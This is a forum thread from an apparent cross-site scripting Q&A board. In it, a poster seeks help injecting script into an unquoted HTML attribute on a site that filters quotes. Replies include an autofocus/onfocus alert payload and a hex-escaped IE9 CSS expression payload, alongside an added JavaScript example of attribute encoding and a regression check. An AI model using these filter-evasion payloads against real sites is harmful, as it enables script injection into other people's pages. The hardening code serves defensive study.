Q and A for any cross site scripting information. Feel free to ask away. 
Close but no cigar, help for the final hurdle?
Date: March 03, 2012 06:43PM

'"(){}/\<> - test chars

Results in source:

<input type="hidden" name="pageURL" value= (){}/\>

and a bit further down:

<input type="text" name="link" id="link" style="width:400px" value=" (){}/\"/>


Can't think of any input type xss which doesn't use ' " ', can anyone help?

Closest I have got:

<input type="hidden" name="pageURL" value=/ AUTOFOCUS onfocus=alert(1) >
[but no alert]

[using Firefox, but any browser would be a help]

TheGreatEscape
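
[Added example, not part of the original thread and not the target site's code: the first reflection point above is an unquoted attribute, so a filter that only drops quotes and angle brackets still lets whitespace start new attributes; the hardened renderer encodes and quotes the value instead. The filter model, function names and tokenizer are assumptions constructed for illustration; the two inputs are the strings posted above.]

```javascript
// Constructed model of the filter seen in the thread (assumption: it drops ' " < >).
function observedFilter(s) {
  return s.replace(/['"<>]/g, '');
}

// The page's first reflection point: the value lands in an UNQUOTED attribute.
function renderUnquoted(v) {
  return '<input type="hidden" name="pageURL" value=' + observedFilter(v) + '>';
}

// Hardened form: entity-encode, then always wrap the value in double quotes.
function encodeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(v) {
  return '<input type="hidden" name="pageURL" value="' + encodeAttr(v) + '">';
}

// Simplified start-tag tokenizer: returns the attribute names a browser would see.
// An unquoted value ends at the first whitespace; a quoted one at its closing quote.
function attributeNames(tag) {
  const body = tag.replace(/^<\w+/, '').replace(/>$/, '');
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(body)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Regression check: a reflected value must never change the attribute set.
function addsAttributes(html) {
  return attributeNames(html).join(',') !== 'type,name,value';
}

// Inputs taken from the thread: the test characters and the poster's closest attempt.
const probe = '\'"(){}/\\<>';
const attempt = '/ AUTOFOCUS onfocus=alert(1) ';

console.log(attributeNames(renderUnquoted(attempt)));
console.log(attributeNames(renderHardened(attempt)));
console.log(renderHardened(probe));
```

[The attribute-set check is the useful regression test here: it flags the unquoted template whether or not a particular reflected value triggers anything in a given browser.]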

Re: Close but no cigar, help for the final hurdle?
Posted by: Albino
Date: March 04, 2012 05:27AM

I think this will work without quotes >>

Gareth Heyes Wrote:
-------------------------------------------------------
> Iframe the target site with the parent in compat
> mode then inject this:
> "style="xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6
> c\65\72\74\28\31\29\29"
>
> This will work on IE9 since the child inherits the
> parent compat mode

-------------------------------------------------------
Research blog

Re: Close but no cigar, help for the final hurdle?
Date: March 04, 2012 02:12PM

That has quotation marks which are filtered, unless I misunderstand something.
